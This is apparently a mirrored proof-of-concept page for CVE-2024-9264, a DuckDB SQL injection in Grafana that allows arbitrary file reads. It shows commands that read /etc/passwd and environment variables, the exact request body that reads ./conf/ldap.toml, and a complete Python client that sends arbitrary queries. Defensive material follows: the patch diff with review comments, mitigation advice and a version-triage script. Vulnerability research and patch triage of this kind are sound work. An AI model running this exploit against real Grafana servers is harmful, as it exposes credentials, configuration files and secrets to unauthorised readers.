POC details: 44713644cd4a449a669b3d4d8b21ab51b5939c3b

Source
Associated vulnerability
Title: Grafana security vulnerability (CVE-2024-9264)
Description: Grafana is an open-source monitoring tool from Grafana that provides a visual monitoring interface; it is mainly used to monitor and analyze backends such as Graphite, InfluxDB and Prometheus. Grafana has a security vulnerability: the experimental SQL Expressions feature does not adequately sanitize user-supplied DuckDB queries, leading to command injection and local file inclusion.
Description
Exploit for Grafana arbitrary file-read (CVE-2024-9264)
Introduction
# CVE-2024-9264  
## Grafana Post-Auth DuckDB SQL Injection (File Read)

### Proof of Concept (PoC)

This PoC demonstrates the exploitation of CVE-2024-9264 using an authenticated user to perform a DuckDB SQL query and read an arbitrary file on the filesystem.

**Setup:**
Install the required dependencies via:
```bash
pip install -r requirements.txt
```

**Usage (File Read Example):**
```bash
python3 CVE-2024-9264.py -u user -p pass -f /etc/passwd http://localhost:3000
```

You can also execute arbitrary DuckDB queries, such as calling `getenv` to retrieve environment variables:
```bash
python3 CVE-2024-9264.py -u user -p pass -q "SELECT getenv('PATH')" http://localhost:3000
```

The list of utility DuckDB functions that can be exploited can be found [here](https://duckdb.org/docs/sql/functions/utility).

### Vulnerability Overview

[CVE-2024-9264](https://grafana.com/security/security-advisories/cve-2024-9264) is a DuckDB SQL injection vulnerability in Grafana's experimental SQL Expressions feature. Any authenticated user can execute arbitrary DuckDB SQL by sending a query of type `sql` to the expression datasource, the same endpoint Grafana dashboards use for Math and Reduce expressions.

**Affected Versions:**
- Grafana OSS and Enterprise 11.0.0 - 11.0.5, 11.1.0 - 11.1.6, and 11.2.0 - 11.2.1. Releases before 11.0.0 do not contain the SQL Expressions feature.

**Patched Versions:**
- 11.0.5+security-01, 11.1.6+security-01 and 11.2.1+security-01, and later releases of each of those minor lines (11.0.6, 11.1.7, 11.2.2 and higher).

### Finding the Patch

Grafana released dedicated `+security-01` builds to fix this vulnerability. To analyze the patch, check out the security tag and diff the two commits:

```bash
git checkout v11.0.5+security-01
git diff 0421a8911cfc05a46c516fd9d033a51e52e51afe 70316b3e1418c9054017047e63c1c96abb26f495
```

This reveals that the patched versions do not fix the query handling; the DuckDB-backed implementation behind SQL Expressions is replaced with a stub whose every method returns `not implemented`:

```diff
+++ b/pkg/expr/sql/db.go
@@ -0,0 +1,26 @@
+package sql
+
+import (
+       "errors"
+
+       "github.com/grafana/grafana-plugin-sdk-go/data"
+)
+
+type DB struct {
+}
+
+func (db *DB) TablesList(rawSQL string) ([]string, error) {
+       return nil, errors.New("not implemented")
+}
+
+func (db *DB) RunCommands(commands []string) (string, error) {
+       return "", errors.New("not implemented")
+}
+
+func (db *DB) QueryFramesInto(name string, query string, frames []*data.Frame, f *data.Frame) error {
+       return errors.New("not implemented")
+}
+
+func NewInMemoryDB() *DB {
+       return &DB{}
+}
```
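Review bot: the three stub methods each return an anonymous `errors.New("not implemented")`, so the caller in `SQLCommand.Execute` forwards a message that does not say the feature was disabled on purpose; declare one package-level sentinel, e.g. `var ErrSQLExpressionsDisabled = errors.New("SQL expressions are disabled")`, return it from `TablesList`, `RunCommands` and `QueryFramesInto`, and callers can match it with `errors.Is` and surface a clear message. The name `NewInMemoryDB` now constructs nothing in memory; a doc comment on `DB` stating that it is a deliberate no-op replacement for the DuckDB backend would spare the next reader from hunting for the missing implementation.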

```diff
@@ -85,7 +84,7 @@ func (gr *SQLCommand) Execute(ctx context.Context, now time.Time, vars mathexp.V
 
        rsp := mathexp.Results{}
 
-       duckDB := duck.NewInMemoryDB()
+       duckDB := sql.NewInMemoryDB()
        var frame = &data.Frame{}
        err := duckDB.QueryFramesInto(gr.refID, gr.query, allFrames, frame);
        if err != nil {
```
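Review bot: the user-controlled SQL still travels all the way into `Execute` as `gr.query` before the stub rejects it on the `QueryFramesInto` call; rejecting the `sql` query type where the expression command is built, before `gr.query` is populated, would fail fast and keep the raw query string out of this code path altogether. Also, the trailing semicolon on the unchanged context line `err := duckDB.QueryFramesInto(gr.refID, gr.query, allFrames, frame);` is not gofmt-clean; run gofmt on the file while it is being touched.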

With the stub in place, no query ever reaches DuckDB, so the patched builds are not exploitable even with a DuckDB binary on the server.

### Exploiting the Vulnerability

1. **Launch Grafana**:
   Run a vulnerable build, for example Grafana Enterprise 11.0.5, in Docker:
   ```bash
   docker run --name=grafana -p 3000:3000 grafana/grafana-enterprise:11.0.5
   ```

2. **Modify an Expression**:
   Create a dashboard with an expression such as "Math", intercept the query request with Burp, and change the query's `type` from `math` to `sql`. The `datasource` block stays `__expr__`; only the query type selects the SQL backend.

   The request is an HTTP POST to `/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101`.

   Below is the minimal JSON body needed to run a DuckDB query that reads an arbitrary file, here `./conf/ldap.toml` (a relative path, resolved against the Grafana process's working directory):
   ```json
   {
     "queries": [
       {
         "refId": "B",
         "datasource": {
           "type": "__expr__",
           "uid": "__expr__",
           "name": "Expression"
         },
         "type": "sql",
         "hide": false,
         "expression": "SELECT content FROM read_blob(\"./conf/ldap.toml\")",
         "window": ""
       }
     ],
     "from": "1729313027261",
     "to": "1729334627261"
   }
   ```
No dashboard needs to exist for the actual exploitation; creating one is just an easy way to capture a well-formed request to `/api/ds/query` and then edit it.
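The request described in the steps above, written out as a small standard-library client. This is an added example, not the repository's `CVE-2024-9264.py` and not Grafana code. It rebuilds the JSON body shown above and posts it with HTTP basic auth. The response layout it reads (`results` -> refId -> `frames` -> `data.values`, with an `error` string on failure) is Grafana's data-frame JSON format and is an assumption here, since the README does not show a response.

```python
"""Minimal client for the CVE-2024-9264 /api/ds/query request.

Added example, not the repository's own exploit script. Assumptions:
- the endpoint and JSON body are exactly those shown in the README above;
- Grafana answers with {"results": {"<refId>": {"frames": [...]}}} on success
  and {"results": {"<refId>": {"error": "..."}}} on failure.
"""
import base64
import json
import urllib.request
from urllib.error import HTTPError

QUERY_PATH = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"


def build_query(sql: str, ref_id: str = "B") -> dict:
    """Return the JSON body Grafana expects for an expression query of type sql."""
    return {
        "queries": [
            {
                "refId": ref_id,
                "datasource": {"type": "__expr__", "uid": "__expr__", "name": "Expression"},
                "type": "sql",  # this field, not datasource.type, selects the DuckDB backend
                "hide": False,
                "expression": sql,
                "window": "",
            }
        ],
        # Arbitrary time range; the SQL expression ignores it
        "from": "1729313027261",
        "to": "1729334627261",
    }


def file_read_sql(path: str) -> str:
    """DuckDB expression that reads `path` as a blob, quoted as in the README.

    A double quote inside the path would break out of the quoted name, so it is
    rejected rather than escaped.
    """
    if '"' in path:
        raise ValueError("path must not contain a double quote")
    return f'SELECT content FROM read_blob("{path}")'


def extract_values(response: dict, ref_id: str = "B") -> list:
    """Return the first column of the first data frame for `ref_id`.

    Raises RuntimeError carrying Grafana's error string when no frame came back
    (for example when the duckdb binary is not on the server's PATH).
    """
    result = response.get("results", {}).get(ref_id, {})
    frames = result.get("frames") or []
    if not frames:
        raise RuntimeError(result.get("error", "no frames returned"))
    values = frames[0].get("data", {}).get("values") or []
    return values[0] if values else []


def run_query(base_url: str, user: str, password: str, sql: str) -> list:
    """POST the query with basic auth and return the first result column."""
    body = json.dumps(build_query(sql)).encode()
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        base_url.rstrip("/") + QUERY_PATH,
        data=body,
        method="POST",
        headers={"Content-Type": "application/json", "Authorization": "Basic " + token},
    )
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return extract_values(json.load(resp))
    except HTTPError as e:
        # Surface the server's own error body; it usually explains why the query failed
        raise RuntimeError(f"HTTP {e.code}: {e.read().decode(errors='replace')}") from e


if __name__ == "__main__":
    import sys

    url, user, pw, path = sys.argv[1:5]
    for chunk in run_query(url, user, pw, file_read_sql(path)):
        print(chunk)
```

Usage: `python3 client.py http://localhost:3000 user pass ./conf/ldap.toml`. Any other DuckDB statement, such as the `getenv` call from the Usage section, can be passed to `run_query` in place of `file_read_sql(path)`.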

### Likelihood of Exploitability

While this vulnerability is rated critical, its exploitability depends on whether a DuckDB binary is installed on the Grafana server: the SQL Expressions feature shells out to the `duckdb` command-line binary rather than embedding DuckDB. **By default, Grafana does not ship with DuckDB installed**, and there is no way to install it from the Grafana interface.

**For this vulnerability to be exploitable, an administrator must have manually installed DuckDB and placed it on the Grafana process's `$PATH`.** If DuckDB is not present, the injected query never executes, which makes successful exploitation unlikely on default installations.

### Mitigation

Update Grafana to a patched version. If patching is delayed, ensure that no `duckdb` binary is on the Grafana process's `$PATH`.
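A triage helper for the two conditions above (affected version and `duckdb` on `PATH`), added here as an example rather than taken from the README or from Grafana. It encodes the affected ranges listed in the Vulnerability Overview. Assumptions: the version string comes from Grafana's `/api/health` endpoint in `MAJOR.MINOR.PATCH` form, optionally followed by the `+security-NN` hotfix tag, and the script runs with the same `PATH` as the Grafana service (the `which` parameter exists so the lookup can be swapped out when checking a remote host).

```python
"""Triage helper for CVE-2024-9264 exposure (added example, not project code).

Assumptions: versions look like "11.0.5" or "11.0.5+security-01" as reported by
Grafana's /api/health; this process shares PATH with the Grafana service.
"""
import re
import shutil

# (major, minor, first affected patch, last affected patch), from the README's
# Affected Versions list
AFFECTED_RANGES = [
    (11, 0, 0, 5),
    (11, 1, 0, 6),
    (11, 2, 0, 1),
]

# MAJOR.MINOR.PATCH, optional +security-NN hotfix tag, optional other suffix
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(\+security-\d+)?(?:[-+].*)?$")


def parse_version(version: str):
    """Return (major, minor, patch, has_security_hotfix)."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Grafana version: {version!r}")
    major, minor, patch = (int(x) for x in m.group(1, 2, 3))
    return major, minor, patch, m.group(4) is not None


def is_affected_version(version: str) -> bool:
    """True when `version` lies in an affected range and carries no +security tag.

    11.0.5 is affected; 11.0.5+security-01 and 11.0.6 are not. Anything outside
    the three listed minor lines (10.x, 11.3+) is treated as not affected.
    """
    major, minor, patch, hotfix = parse_version(version)
    if hotfix:
        return False
    return any(
        major == mj and minor == mn and lo <= patch <= hi
        for mj, mn, lo, hi in AFFECTED_RANGES
    )


def duckdb_on_path(which=shutil.which) -> bool:
    """True when a `duckdb` executable is resolvable on PATH."""
    return which("duckdb") is not None


def assess(version: str, duckdb_present: bool) -> str:
    """Combine both conditions into a one-line verdict."""
    if not is_affected_version(version):
        return "not affected: version outside the affected ranges or already hotfixed"
    if not duckdb_present:
        return "vulnerable code present but not exploitable: no duckdb on PATH; patch anyway"
    return "EXPLOITABLE: affected version and duckdb on PATH; patch or remove duckdb now"


if __name__ == "__main__":
    import sys

    print(assess(sys.argv[1], duckdb_on_path()))
```

Run it as `python3 triage.py 11.0.5` on the Grafana host. The `-pre` style suffixes Grafana uses for pre-releases are accepted by the regex and treated as the numbered version they precede, which errs on the side of reporting exposure.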

### Credits

This PoC uses the [ten](https://github.com/cfreal/ten) framework developed by [cfreal](https://github.com/cfreal).
File snapshot

[4.0K] /data/pocs/44713644cd4a449a669b3d4d8b21ab51b5939c3b
├── [3.8K] CVE-2024-9264.py
├── [4.7K] README.md
└── [ 20] requirements.txt

0 directories, 3 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the PoC through the Source link above.
    2. If the source is unavailable or has been taken down, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.